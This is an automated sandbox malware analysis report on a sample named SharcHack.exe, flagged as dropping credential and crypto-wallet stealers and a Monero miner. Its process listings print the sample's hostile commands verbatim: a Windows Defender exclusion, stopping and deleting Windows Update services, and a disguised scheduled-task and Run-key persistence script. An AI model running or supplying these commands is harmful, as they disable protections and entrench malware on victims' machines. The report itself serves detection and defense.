Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SharcHack.exe

Overview

General Information

Sample name:SharcHack.exe
Analysis ID:1581756
MD5:796310542e9fb2886de3f8cbdf88c9fa
SHA1:01dc8e64ff23db2f177e3d999c12329bfcd206d3
SHA256:9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
Tags:exeuser-aachum
Infos:

Detection

Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Ades Stealer
Yara detected BlackGuard
Yara detected Nitro Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected VEGA Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses Register-ScheduledTask to add task schedules
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
query blbeacon for getting browser version

Classification

  • System is w10x64
  • SharcHack.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\SharcHack.exe" MD5: 796310542E9FB2886DE3F8CBDF88C9FA)
    • 3.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Local\Temp\3.exe" MD5: A4C45AAF11FC601009A5682FD23790EE)
    • VegaStealer_v2.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe" MD5: 9F4F298BCF1D208BD3CE3907CFB28480)
      • v2.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\v2.exe" MD5: 3F62213D184B639A0A62BCB1E65370A8)
    • CheatEngine75.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" MD5: CCEF241F10766A2E12298FBA4D319450)
      • CheatEngine75.tmp (PID: 6476 cmdline: "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" MD5: E652D75D1D0D3F03B6B730E064E9194C)
  • powershell.exe (PID: 6176 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3176 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5356 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3292 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 1052 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2200 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2360 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • reg.exe (PID: 6532 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6520 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6180 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 5660 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6540 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6400 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6332 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2820 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5880 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5524 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 3716 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1848 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6464 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • updater.exe (PID: 1396 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: A4C45AAF11FC601009A5682FD23790EE)
    • conhost.exe (PID: 360 cmdline: C:\Windows\System32\conhost.exe ubulqosn MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1196 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5416 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 360 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4984 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4028 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7060 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2664 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • reg.exe (PID: 2800 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6768 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6176 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 6400 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 7088 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6728 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5852 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 4956 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 344 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2300 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 3528 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5520 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5796 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BlackGuardAccording to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\v2.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\AppData\Local\Temp\v2.exeJoeSecurity_NitroStealerYara detected Nitro StealerJoe Security
        C:\Users\user\AppData\Local\Temp\v2.exeJoeSecurity_BlackGuardYara detected BlackGuardJoe Security
          C:\Users\user\AppData\Local\Temp\v2.exeJoeSecurity_VEGAStealerYara detected VEGA StealerJoe Security
            C:\Users\user\AppData\Local\Temp\v2.exeJoeSecurity_AdesStealerYara detected Ades StealerJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitroStealerYara detected Nitro StealerJoe Security
                00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlackGuardYara detected BlackGuardJoe Security
                  00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VEGAStealerYara detected VEGA StealerJoe Security
                    00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AdesStealerYara detected Ades StealerJoe Security
                      00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 29 entries
                        SourceRuleDescriptionAuthorStrings
                        7.0.v2.exe.aa0000.0.unpackJoeSecurity_NitroStealerYara detected Nitro StealerJoe Security
                          7.0.v2.exe.aa0000.0.unpackJoeSecurity_BlackGuardYara detected BlackGuardJoe Security
                            7.0.v2.exe.aa0000.0.unpackJoeSecurity_VEGAStealerYara detected VEGA StealerJoe Security
                              7.0.v2.exe.aa0000.0.unpackJoeSecurity_AdesStealerYara detected Ades StealerJoe Security
                                7.0.v2.exe.aa0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                                  Click to see the 11 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 3176, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, CommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, CommandLine|base64offset|contains: , Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, ProcessId: 6464, ProcessName: schtasks.exe
